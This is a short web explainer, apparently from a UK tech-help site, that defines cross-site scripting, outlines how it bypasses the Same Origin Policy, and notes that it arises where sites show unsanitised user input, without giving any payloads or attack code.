• 07948 570815
  • This email address is being protected from spambots. You need JavaScript enabled to view it.

Advertisement

What is cross-site scripting (XSS)?

What is cross-site scripting (XSS)?

Cross-site scripting (XSS) is a client-side variant of the injection attack, which attempts to fool a website into placing malicious code onto a visitor's browser.

XSS attacks target vulnerable websites by having them quietly 'inject' malicious scripts onto a user's machine as they visit them, enabling the attacker to masquerade as the victim. Any data associated with that user's browser can be accessed by the attacker, allowing them to perform the same website actions and potentially gain access to highly sensitive data.

Advertisement

How does Cross-site scripting XSS work?

The vulnerability allows attackers to bypass the Same Origin Policy (SOP) - a basic principle of web design that prevents applications from accessing the content on pages from a different origin. Typically, the policy ensures websites operate with guardrails, stopping code from that one random online marketplace you visited from accessing code on your online banking dashboard.

For example, under SOP, https://www.itsecuritycentre.co.uk/index.html can access scripts from the same root address, such as https://www.itsecuritycentre.co.uk/example.html, but not from https://www.facebook.com/example.html.

However, hackers are able to bypass this restriction by using a cross-site scripting vulnerability to inject their own code onto a website, making it look like that malicious code originated from the attacked website, rather than an external source.

Advertisement

Importantly, this vulnerability only exists on sites that present unsanitised user information as an output on their pages. This is effectively any site that hosts and stores comments, posts, form entries or any other method user input, without performing any additional processing steps before it's hosted, such as stripping away HTML code.


Advertisement
laptop 365 advert

AdvertisementLaptop Keys UK

Newsletter Subscribe

Advertisement

Advertisement

Advertisement

More Cyber Articles

More Tech Help Articles

More Tech Bull Articles

© {2019} Tech Bull UK. All Rights Reserved. Powered by Tech Bull UK